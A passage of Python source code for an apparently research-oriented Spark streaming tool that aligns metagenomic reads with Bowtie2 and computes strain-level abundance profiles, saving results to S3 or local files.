def set_bowtie2_index_path(bowtie2_index_path):
"""
Sets the path at which the Bowtie2 index can be found in each local node in the cluster.
Args:
bowtie2_index_path: A path in the local nodes at which Bowtie2 can be found at. Note that this should match
the path that was given in the "app-setup.sh" bootstrap script.
Returns:
Nothing.
"""
global BOWTIE2_INDEX_PATH
BOWTIE2_INDEX_PATH = bowtie2_index_path
def get_bowtie2_index_path():
"""
Retrieves the path at which the local Bowtie2 index can be found.
Returns:
A path in the local nodes at which Bowtie2 can be found at. Note that this will match the path that
was given in the "app-setup.sh" bootstrap script.
"""
global BOWTIE2_INDEX_PATH
return BOWTIE2_INDEX_PATH
def set_bowtie2_index_name(bowtie2_index_name):
"""
Sets the name of the Bowtie2 index name we'll be using.
Returns:
Nothing.
"""
global BOWTIE2_INDEX_NAME
BOWTIE2_INDEX_NAME = bowtie2_index_name
def get_bowtie2_index_name():
"""
Retrieves the name of the Bowtie2 index name we'll be using.
Returns:
A string with the name of the Bowtie2 index.
"""
global BOWTIE2_INDEX_NAME
return BOWTIE2_INDEX_NAME
def set_bowtie2_number_threads(bowtie2_number_threads):
"""
Sets the number of threads in a Bowtie2 command.
Args:
bowtie2_number_threads: INT, the number of threads to give to bowtie2.
Returns:
Nothing.
"""
global BOWTIE2_THREADS
BOWTIE2_THREADS = bowtie2_number_threads
def get_bowtie2_number_threads():
"""
Get the number of threads that Bowtie2 is currently using.
Returns:
INT The number of bowtie2 threads.
"""
global BOWTIE2_THREADS
return BOWTIE2_THREADS
def set_time_of_last_rdd(time_of_last_rdd_processed):
"""
Sets the time at which the last RDD was processed.
Returns:
Nothing. Set() method.
"""
global TIME_OF_LAST_RDD
TIME_OF_LAST_RDD = time_of_last_rdd_processed
def get_time_of_last_rdd():
"""
Retrieves the time at which the last RDD was processed.
Returns:
TIME_OF_LAST_RDD object that represents the time at which the last RDD ended processing.
"""
global TIME_OF_LAST_RDD
return TIME_OF_LAST_RDD
#
# Dictionary.
# The 'OVERALL_ABUNDANCES' dictionary contains the rolling sum of the abundances from each of the
# ingested shards. When there are no more shards to process, we write the abundances to a file.
#
OVERALL_ABUNDANCES = {}
def set_overall_abundances(abundance_acc):
global OVERALL_ABUNDANCES
OVERALL_ABUNDANCES = abundance_acc
def get_overall_abundaces():
global OVERALL_ABUNDANCES
return OVERALL_ABUNDANCES
# -------------------------------------------- Stream from a Directory ------------------------------------------------
#
#
def dispatch_stream_from_dir(stream_source_dir, sampleID, sample_format, output_file, save_to_local, save_to_s3,
partition_size, ssc, sensitive_align, annotations_dictionary, s3_output_bucket,
number_of_shards, keep_shard_profiles, coalesce_output, sample_type, verbose_output,
debug_mode, streaming_timeout):
"""
Executes the requested Spark job in the cluster using a streaming strategy.
Args:
stream_source_dir: The directory to stream files from.
number_of_shards: The number of shards that we'll be picking up from 'stream_source_dir'.
keep_shard_profiles: Retains the rolling shard profiles in S3 or the local filesystem.
sampleID: The unique id of the sample.
sample_format: What type of input format are the reads in (tab5, fastq, tab6, etc.).
sample_type: Are the reads single-end or paired-end.
output_file: The path to the output file.
save_to_s3: Flag for storing output to AWS S3.
save_to_local: Flag for storing output to the local filesystem.
partition_size: Level of parallelization for RDDs that are not partitioned by the system.
ssc: Spark Streaming Context.
sensitive_align: Sensitive Alignment Mode.
annotations_dict: Dictionary of Annotations for reporting organism names.
s3_output_bucket: The S3 bucket to write files into.
coalesce_output: Merge output into a single file.
verbose_output: Flag for wordy terminal print statements.
debug_mode: Flag for debug mode. Activates slow checkpoints.
streaming_timeout: Time (in sec) after which streaming will stop.
Returns:
Nothing, if all goes well it should return cleanly.
"""
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Stream Source: [DIRECTORY]")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Sample ID: " + sampleID +
" (" + sample_format + ", " + sample_type + ")")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Number of Sample Shards: " +
str(number_of_shards))
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Streaming starting...")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Please copy reads into streaming directory.")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Waiting for input...")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
# Set the number of shards so that we can safely exit after we have analyzed the requested number of shards.
set_number_of_shards(int(number_of_shards))
kinesis_decode = False
# Tab5-formatted FASTQ reads.
if sample_format == "tab5":
#
# Before we do anything, we have to move the data back to the Master. The way Spark Streaming works, is that
# the RDDs will be processed in the Worker in which they were received, which does not parallelize well.
# If we did not ship the input reads back to the master, then they would only be aligned in one Executor.
#
sc = ssc.sparkContext
overall_abundance_accumulator = sc.accumulator({}, AbundanceAccumulator())
set_overall_abundances(overall_abundance_accumulator)
# In this approach, we'll stream the reads from a S3 directory that we monitor with Spark.
sample_dstream = ssc.textFileStream(stream_source_dir)
sample_dstream.foreachRDD(lambda rdd: profile_sample(sampleReadsRDD=rdd,
sc=sc,
ssc=ssc,
output_file=output_file,
save_to_s3=save_to_s3,
save_to_local=save_to_local,
sample_type=sample_type,
sensitive_align=sensitive_align,
annotations_dictionary=annotations_dictionary,
partition_size=partition_size,
s3_output_bucket=s3_output_bucket,
kinesis_decode=kinesis_decode,
keep_shard_profiles=keep_shard_profiles,
coalesce_output=coalesce_output,
verbose_output=verbose_output,
debug_mode=debug_mode,
streaming_timeout=streaming_timeout,
bowtie2_node_path=get_bowtie2_path(),
bowtie2_index_path=get_bowtie2_index_path(),
bowtie2_index_name=get_bowtie2_index_name(),
bowtie2_number_threads=get_bowtie2_number_threads()))
# ---------------------------------------- Start Streaming ----------------------------------------------------
#
#
ssc.start() # Start to schedule the Spark job on the underlying Spark Context.
ssc.awaitTermination() # Wait for the streaming computations to finish.
ssc.stop() # Stop the Streaming context
# -------------------------------------------- Stream from a Directory ------------------------------------------------
#
#
def dispatch_stream_from_kinesis(sampleID, sample_format, output_file, save_to_local, save_to_s3, partition_size, ssc,
app_name, stream_name, endpoint_url, region_name, keep_shard_profiles,
sensitive_align, annotations_dictionary, s3_output_bucket, coalesce_output,
number_of_shards, sample_type, verbose_output, debug_mode, streaming_timeout):
"""
Executes the requested Spark job in the cluster using a streaming strategy.
Args:
sampleID: The unique id of the sample.
sample_format: What type of input format are the reads in (tab5, fastq, tab6, etc.).
sample_type: Are the reads single-end or paired-end.
number_of_shards: The number of shards that we'll be picking up from the Kinesis stream.
output_file: The path to the output file.
save_to_s3: Flag for storing output to AWS S3.
save_to_local: Flag for storing output to the local filesystem.
partition_size: Level of parallelization for RDDs that are not partitioned by the system.
ssc: Spark Streaming Context.
app_name: Kinesis app name.
stream_name: Kinesis stream name.
endpoint_url: Kinesis Stream URL.
region_name: Amazon region name for the Kinesis stream.
sensitive_align: Sensitive Alignment Mode.
annotations_dict: Dictionary of Annotations for reporting organism names.
s3_output_bucket: The S3 bucket to write files into.
keep_shard_profiles: Retains the rolling shard profiles in S3 or the local filesystem.
coalesce_output: Merge output into a single file.
verbose_output: Flag for wordy terminal print statements.
debug_mode: Flag for debug mode. Activates slow checkpoints.
streaming_timeout: Time (in sec) after which streaming will stop.
Returns:
Nothing, if all goes well it should return cleanly.
"""
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Stream Source: [KINESIS]")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Sample ID: " + sampleID +
" (" + sample_format + ", " + sample_type + ")")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Stream Name: " + endpoint_url)
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Region: " + region_name)
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Streaming starting...")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
# Set the number of shards so that we can safely exit after we have analyzed the requested number of shards.
set_number_of_shards(int(number_of_shards))
kinesis_decode = True
# Tab5-formatted FASTQ reads.
if sample_format == "tab5":
#
# Kinesis streaming
#
sample_dstream = KinesisUtils.createStream(ssc,
app_name,
stream_name,
endpoint_url,
region_name,
InitialPositionInStream.TRIM_HORIZON,
5)
#
# Before we do anything, we have to move the data back to the Master. The way Spark Streaming works, is that
# the RDDs will be processed in the Worker in which they were received, which does not parallelize well.
# If we did not ship the input reads back to the master, then they would only be aligned in one Executor.
#
sc = ssc.sparkContext
sample_dstream.foreachRDD(lambda rdd: profile_sample(sampleReadsRDD=rdd,
sc=sc,
ssc=ssc,
output_file=output_file,
save_to_s3=save_to_s3,
save_to_local=save_to_local,
sample_type=sample_type,
sensitive_align=sensitive_align,
annotations_dictionary=annotations_dictionary,
partition_size=partition_size,
s3_output_bucket=s3_output_bucket,
kinesis_decode=kinesis_decode,
keep_shard_profiles=keep_shard_profiles,
coalesce_output=coalesce_output,
verbose_output=verbose_output,
debug_mode=debug_mode,
streaming_timeout=streaming_timeout,
bowtie2_node_path=get_bowtie2_path(),
bowtie2_index_path=get_bowtie2_index_path(),
bowtie2_index_name=get_bowtie2_index_name(),
bowtie2_number_threads=get_bowtie2_number_threads()))
# ---------------------------------------- Start Streaming ----------------------------------------------------
#
#
ssc.start() # Start to schedule the Spark job on the underlying Spark Context.
ssc.awaitTermination() # Wait for the streaming computations to finish.
ssc.stop() # Stop the Streaming context
# --------------------------------------------- Processing Functions --------------------------------------------------
#
# This is where all the action is. This function gets called by both of the streaming job functions, and the code
# for passing the data to Bowtie2, and receiving it back, is in these functions.
#
def profile_sample(sampleReadsRDD, sc, ssc, output_file, save_to_s3, save_to_local, sensitive_align, partition_size,
annotations_dictionary, s3_output_bucket, keep_shard_profiles, coalesce_output, verbose_output,
bowtie2_node_path, bowtie2_index_path, bowtie2_index_name, bowtie2_number_threads, sample_type,
debug_mode, streaming_timeout, kinesis_decode=None):
#
# Nested inner function that gets called from the 'mapPartitions()' Spark function.
#
def align_with_bowtie2(iterator):
"""
Function that runs on ALL worker nodes (Executors). Dispatches a Bowtie2 command and handles read alignments.
Args:
iterator: Iterator object from Spark
Returns: An iterable collection of read alignments in SAM format.
"""
alignments = []
worker_node_ip = str(sp.check_output(["hostname"])).strip()
#
# We pick up the RDD with reads that we set as a broadcast variable "previously" — The location of this action
# happens in the code below, which executes before 'this' code block.
#
reads_list = broadcast_sample_reads.value
# Obtain a properly formatted Bowtie2 command.
bowtieCMD = getBowtie2Command(bowtie2_node_path=bowtie2_node_path,
bowtie2_index_path=bowtie2_index_path,
bowtie2_index_name=bowtie2_index_name,
bowtie2_number_threads=bowtie2_number_threads)
if sensitive_align:
bowtieCMD = getBowtie2CommandSensitive(bowtie2_node_path=bowtie2_node_path,
bowtie2_index_path=bowtie2_index_path,
bowtie2_index_name=bowtie2_index_name,
bowtie2_number_threads=bowtie2_number_threads)
# Open a pipe to the subprocess that will launch the Bowtie2 aligner.
try:
align_subprocess = sp.Popen(bowtieCMD, stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE)
pickled_reads_list = pickle.dumps(reads_list)
# no_reads = len(reads_list)
alignment_output, alignment_error = align_subprocess.communicate(input=pickled_reads_list.decode('latin-1'))
# The output is returned as a 'bytes' object, so we'll convert it to a list. That way, 'this' worker node
# will return a list of the alignments it found.
for a_read in alignment_output.strip().decode().splitlines():
# Each alignment (in SAM format) is parsed and broken down into two (2) pieces: the read name,
# and the genome reference the read aligns to. We do the parsing here so that it occurs in the
# worker node and not in the master node. A benefit of parsing alignments in the worker node is
# that it also brings down the size of the 'alignment' object that gets transmitted through the
# network. Note that networking costs are minimal for a 'few' alignments, but they do add up
# for large samples with many shards.
#
# SAM format: [0] - QNAME (the read name)
# [1] - FLAG
# [2] - RNAME (the genome reference name that the read aligns to
#
alignment = a_read.split("\t")[0] + "\t" + a_read.split("\t")[2]
# Once the alignment has been parsed, we add it to the return list of alignments that will be
# sent back to the master node.
alignments.append(alignment)
except sp.CalledProcessError as err:
print( "[Flint - ALIGN ERROR] " + str(err))
sys.exit(-1)
return iter(alignments)
# -----------------------------------------------------------------------------------------------------------------
#
#
def get_organism_name(gca_id):
"""
Nested function for retrieving and constructing a proper organism name for the reports.
Args:
gca_id: The 'GCA' formatted ID to look up in the annotations.
Returns:
A properly formatted string for the organism name that contains a Taxa_ID, Genus-Species-Strain name,
and the GCA_ID that was used for the query.
"""
organism_name_string = ""
if gca_id in annotations_dictionary:
taxa_id = annotations_dictionary[gca_id]['taxa_id']
organism_name = annotations_dictionary[gca_id]['organism_name']
organism_name_string = str(taxa_id) + "\t" + str(gca_id) + "\t" + str(organism_name)
else:
organism_name_string = gca_id
return organism_name_string
# -----------------------------------------------------------------------------------------------------------------
#
#
def accumulate_abundaces(a_strain):
print("Hello from accumulate_abundances()")
strain_name = a_strain[0]
abundance_count = a_strain[1]
# abundances = get_overall_abundaces()
global OVERALL_ABUNDANCES
OVERALL_ABUNDANCES += {strain_name: abundance_count}
return a_strain
# -----------------------------------------------------------------------------------------------------------------
#
# The main 'profileSample()' function starts here.
#
try:
if not sampleReadsRDD.isEmpty():
if get_shard_counter() == 0:
set_analysis_start_time()
# -------------------------------------- Alignment --------------------------------------------------------
#
# First, we'll convert the RDD to a list, which we'll then convert to a Spark.broadcast variable
# that will be shipped to all the Worker Nodes (and their Executors) for read alignment.
#
if kinesis_decode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Decoding Kinesis Stream...")
sample_reads_list = json.loads(sampleReadsRDD.collect())
else:
sample_reads_list = sampleReadsRDD.collect() # collect returns <type 'list'> on the main driver.
number_input_reads = len(sample_reads_list)
#
# The RDD with reads is set as a Broadcast variable that will be picked up by each worker node.
#
broadcast_sample_reads = sc.broadcast(sample_reads_list)
#
# Run starts here.
#
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Shard: " +
str(get_shard_counter()) + " of " + str(get_shards()))
read_noun = ""
if sample_type.lower() == "paired":
read_noun == "Paired-End"
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Input: " +
'{:0,.0f}'.format(number_input_reads) + " " + read_noun + " Reads.")
alignment_start_time = time.time()
data = sc.parallelize(range(1, partition_size))
data_num_partitions = data.getNumPartitions()
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] No. RDD Partitions: " +
str(data_num_partitions))
#
# Dispatch the Alignment job with Bowtie2
#
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Aligning reads with Bowtie2 (" + str(bowtie2_number_threads) + ")...")
if sensitive_align:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Using Sensitive Alignment Mode...")
alignments_RDD = data.mapPartitions(align_with_bowtie2)
number_of_alignments = alignments_RDD.count()
alignment_end_time = time.time()
alignment_total_time = alignment_end_time - alignment_start_time
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Bowtie2 - Complete. " +
"(" + str(timedelta(seconds=alignment_total_time)) + ")")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]" + " Found: " +
'{:0,.0f}'.format(number_of_alignments) + " Alignments.")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Analyzing...")
# ------------------------------------------- Map 1 -------------------------------------------------------
#
# The Map step sets up the basic data structure that we start with — a map of reads to the genomes they
# align to. We'll Map a read (QNAME) with a genome reference name (RNAME).
# The REDUCE 1 step afterwards will collect all the genomes and key them to a unique read name.
#
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Mapping Reads to Genomes (QNAME-RNAME).")
map_reads_to_genomes = alignments_RDD.map(lambda line: (line.split("\t")[0], [line.split("\t")[1]])).cache()
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 1: Map 1, map_reads_to_genomes")
chk_1_s = time.time()
checkpoint_1 = map_reads_to_genomes.count()
chk_1_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_1_e - chk_1_s))))
if verbose_output:
# We use the following block to get the Overall Mapping Rate for 'this' shard.
list_unique_reads = map_reads_to_genomes.flatMap(lambda x: x).keys().distinct()
number_of_reads_aligned = list_unique_reads.count()
overall_mapping_rate = float(number_of_reads_aligned) / number_input_reads
overall_mapping_rate = overall_mapping_rate * 100
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Shard Mapping Rate: " +
'{:.2f}'.format(overall_mapping_rate) + "%")
# ------------------------------------------ Reduce 1 -----------------------------------------------------
#
# Reduce will operate first by calculating the read contributions, and then using these contributions
# to calculate an abundance.
# Note the "+" operator can be used to concatenate two lists. :)
#
# 'Reduce by Reads' will give us a 'dictionary-like' data structure that contains a Read Name (QNAME) as
# the KEY, and a list of genome references (RNAME) as the VALUE. This allows us to calculate
# each read's contribution.
#
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Reducing Reads to list of Genomes...")
reads_to_genomes_list = map_reads_to_genomes.reduceByKey(lambda l1, l2: l1 + l2)
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 2: Reduce 1, reads_to_genomes_list")
chk_2_s = time.time()
checkpoint_2 = reads_to_genomes_list.count()
chk_2_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_2_e - chk_2_s))))
# ------------------------------------ Map 2, Fractional Reads --------------------------------------------
#
# Read Contributions.
# Each read is normalized by the number of genomes it maps to. The idea is that reads that align to
# multiple genomes will contribute less (have a hig denominator) than reads that align to fewer genomes.
#
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Calculating Read Contributions...")
read_contributions = reads_to_genomes_list.mapValues(lambda l1: 1 / float(len(l1)))
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 3: Map 2, read_contributions")
chk_3_s = time.time()
checkpoint_3 = read_contributions.count()
chk_3_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_3_e - chk_3_s))))
#
# Once we have the read contributions, we'll JOIN them with the starting 'map_reads_to_genomes' RDD to
# get an RDD that will map the read contribution to the Genome it aligns to.
# Note: l[0] is the Read name (key), and l[1] is the VALUE (a list) after the join.
#
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Joining Read Contributions to Genomes...")
read_contribution_to_genome = read_contributions.join(map_reads_to_genomes)\
.map(lambda l: (l[1][0], "".join(l[1][1])))
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 4: read_contribution_to_genome")
chk_4_s = time.time()
checkpoint_4 = read_contribution_to_genome.count()
chk_4_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_4_e - chk_4_s))))
#
# Now have an RDD mapping the Read Contributions to Genome Names, we'll flip the (KEY,VALUE) pairings
# so that we have Genome Name as KEY and Read Contribution as Value.
#
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Flipping Genomes and Read Contributions...")
genomes_to_read_contributions = read_contribution_to_genome.map(lambda x: (x[1], x[0]))
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 5: genomes_to_read_contributions")
chk_5_s = time.time()
checkpoint_5 = genomes_to_read_contributions.count()
chk_5_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_5_e - chk_5_s))))
# --------------------------------------- Reduce 2, Abundances --------------------------------------------
#
# Following the KEY-VALUE inversion, we do a reduceByKey() to aggregate the fractional counts for a
# given genomic assembly and calculate its abundance.
#
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Calculating Genome Abundances...")
genomic_assembly_abundances = genomes_to_read_contributions.reduceByKey(lambda l1, l2: l1 + l2)
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 6: Reduce 2, genomic_assembly_abundances")
chk_6_s = time.time()
checkpoint_6 = genomic_assembly_abundances.count()
chk_6_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_6_e - chk_6_s))))
#
# Strain level abundances
# At this point we have abundances at the genomic-assembly level (chromosomes, contigs, etc.), but what
# we are after is abundances one level higher, i.e., at the Strain level. So we'll do one more map to
# to set a key that we can reduce with at the Strain level.
#
# Note: The key to map here is critical. The assembly FASTA files need to be in a format that tells us
# how to 'fold up' the assemblies into a parent taxa. The FASTA files we indexed had a Taxonomic ID
# that tells us the Organism name (at the Strain level), and it is delimited by a period and located
# at the beginning of the FASTA record.
#
strain_map = genomic_assembly_abundances.map(lambda x: ("GCA_" + x[0].split(".")[0], x[1]))
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 7: strain_map")
chk_7_s = time.time()
checkpoint_7 = strain_map.count()
chk_7_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_7_e - chk_7_s))))
#
# Once the Mapping of organism names at the Strain level is complete, we can just Reduce them to
# aggregate the Strain-level abundances.
#
strain_abundances = strain_map.reduceByKey(lambda l1, l2: l1 + l2).cache()
if debug_mode:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] • Checkpoint 8: strain_abundances")
chk_8_s = time.time()
checkpoint_8 = strain_abundances.count()
chk_8_e = time.time()
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] TIME: " + str(timedelta(seconds=(chk_8_e - chk_8_s))))
# --------------------------------------- Abundance Coalescing --------------------------------------------
#
# If requested, we'll continously update the rolling count of abundances for the strains that we've
# seen, or add new ones. Note that this involves a call to 'collect()' which brings back everything
# to the Master node, so there is a slight hit on performance.
#
if coalesce_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Updating abundance counts...")
# Use 'collect()' to aggregate the counts for 'this' Shard and accumulate the rolling count.
# We are violating the prime directive of Spark design patterns by using 'collect()', but in
# practice, the call adds a negligible amount to the running time.
# list_strain_abundances = strain_abundances.collect()
#
# for a_strain in list_strain_abundances:
# strain_name = a_strain[0]
# abundance_count = a_strain[1]
#
# if strain_name in OVERALL_ABUNDANCES:
# OVERALL_ABUNDANCES[strain_name] += abundance_count
# else:
# OVERALL_ABUNDANCES[strain_name] = abundance_count
abundace_rdd = strain_abundances.map(lambda x: accumulate_abundaces(x)).cache()
abundance_count = abundace_rdd.count()
else:
if save_to_s3:
output_file = output_file.replace("/abundances.txt", "")
output_dir_s3_path = "s3a://" + s3_output_bucket + "/" + output_file + "/shard_" + \
str(RDD_COUNTER) + "/"
strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
.saveAsTextFile(output_dir_s3_path)
# Careful with this. This will cause the individual files to be stored in Worker nodes, and
# not in the Master node.
# TODO: Refactor so that it sends it back to the Master, and stores it in the 'local' master path.
# if save_to_local:
# output_dir_local_path = output_file.replace("abundances.txt", "/shard_" + str(RDD_COUNTER))
# abundances_list = strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
# .saveAsTextFile("file://" + output_dir_local_path)
# ------------------------------------------ Shard Profiles -----------------------------------------------
#
# The user can specify whether to retain individual Shard profiles. The flag that controls this
# 'keep_shard_profiles' works in conjuction with the '' and '' flags. So the rolling shard prolies
# will be stored in the location that the user requested.
#
if keep_shard_profiles:
# -------------------------------------- S3 Rolling Output --------------------------------------------
if save_to_s3:
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Saving to S3 bucket...")
# Pointer to S3 filesystem.
sc._jsc.hadoopConfiguration().set("mapred.output.committer.class",
"org.apache.hadoop.mapred.FileOutputCommitter")
URI = sc._gateway.jvm.java.net.URI
Path = sc._gateway.jvm.org.apache.hadoop.fs.Path
FileSystem = sc._gateway.jvm.org.apache.hadoop.fs.FileSystem
fs_uri_string = "s3a://" + s3_output_bucket + ""
fs = FileSystem.get(URI(fs_uri_string), sc._jsc.hadoopConfiguration())
shard_sub_dir = "shard-profiles"
output_file = output_file.replace("/abundances.txt", "")
shard_sub_dir_path = "s3a://" + s3_output_bucket + "/" + output_file + "/" + shard_sub_dir
# Create the 1st temporary output file through the 'saveAsTextFile()' method.
tmp_output_file = shard_sub_dir_path + "-tmp"
strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
.coalesce(1) \
.saveAsTextFile(tmp_output_file)
# This is the "tmp" file created by "saveAsTextFile()", by default its named "part-00000").
created_file_path = Path(tmp_output_file + "/part-00000")
# The gimmick here is to move the tmp file into a final location so that "saveAsTextFile()"
# can write again.
str_for_rename = shard_sub_dir_path + "/abundances-" + str(RDD_COUNTER) + ".txt"
renamed_file_path = Path(str_for_rename)
# Create the directory in which we'll be storing the shard profiles.
fs.mkdirs(Path(shard_sub_dir_path))
# The "rename()" function can be used as a "move()" if the second path is different.
fs.rename(created_file_path, renamed_file_path)
# Remove the "tmp" directory we created when we used "saveAsTextFile()".
fs.delete(Path(tmp_output_file))
# ------------------------------------ Local Rolling Output -------------------------------------------
if save_to_local:
if verbose_output:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] Saving to local filesystem...")
rdd_counter_str = "-" + str(RDD_COUNTER) + ".txt"
output_file = output_file.replace("abundances", "/shard_profiles/abundances")
output_file = output_file.replace(".txt", rdd_counter_str)
writer = csv.writer(open(output_file, "wb"), delimiter='|', lineterminator="\n", quotechar='',
quoting=csv.QUOTE_NONE)
abundances_list = strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
.repartition(1).collect()
for a_line in abundances_list:
writer.writerow([a_line])
# -------------------------------------------- End of Run -------------------------------------------------
#
# Housekeeping tasks go here. This completes the processing of a single streamed shard.
# Increment the counter that we use to keep track of, and also use as an affix for a RDDs profile count.
increment_rdd_count()
# Set the time at which 'this' RDD (a sample shard) was last processed.
set_time_of_last_rdd(time.time())
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Done.")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
# ---------------------------------------------- Empty RDD Case -----------------------------------------------
#
else:
# If we've analyzed the same number of shards as those that were requested, we stop the streaming.
# How we stop streaming, it depends on what flags were set. We'll stop the streaming if the time
# between the last RDD processed and now is greater than a user-defined timeout, or 3 seconds for
# the default. Another way to stop is to have processed a certain number of shards. If this number
# has been reached, then we'll go ahead and stop.
time_of_last_check = get_time_of_last_rdd()
time_now = time.time()
check_delta = timedelta(seconds=(time_now - time_of_last_check))
check_delta_int = int(check_delta.seconds)
if time_of_last_check != 0:
if shard_equals_counter() or check_delta_int > streaming_timeout:
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
"] All Requested Sample Shards Finished. (" + str(get_shards()) + " shards)")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Stopping Streaming.")
set_analysis_end_time()
# The last thing we do is to stop the streaming context. Once this command finishes, we are
# jumped back-out into the code-block that called us — the 'flint.py' script.
ssc.stop()
except Exception as ex:
template = "[Flint - ERROR] An exception of type {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
# --------------------------------------------- Non-Streaming Job -----------------------------------------------------
#
#
def dispatch_local_job(mate_1, mate_2, tab5File, sampleID, sample_format, output_file,
save_to_s3, partition_size, sc):
"""
Executes the requested Spark job in the cluster in a non-streaming method.
Args:
mate_1: Paired-end reads left-side read.
mate_2: Paired-end reads right-side read.
tab5File: Sample reads file in tab5 format.
sampleID: The unique id of the sample.
sample_format: What type of input format are the reads in (tab5, fastq, tab6, etc.).
output_file: The path to the output file.
save_to_s3: Flag for storing output to AWS S3.
partition_size: Level of parallelization for RDDs that are not partitioned by the system.
sc: Spark Context.
Returns:
Nothing, if all goes well it should return cleanly.
"""
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]" + " Analyzing Sample " + sampleID +
" (" + sample_format + ")")
#
# Paired-end Reads Code path.
#
if sample_format == "tab5":
# ------------------------------------------ Alignment ----------------------------------------------------
#
# Alignment of sample reads to the index in each of the workers is delegated to Bowtie2, and getting the
# reads to bowtie2 is performed through Spark's most-excellent pipe() function that sends the contents
# of the RDD to the STDIN of the mapping script. The mapping script communicates with bowtie2 and outputs
# the alignments to STDOUT which is captured by Spark and returned to us as an RDD.
#
print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Loading Sample...")
sampleRDD = loadTab5File(sc, tab5File)
sampleReadsRDD = sampleRDD.values()
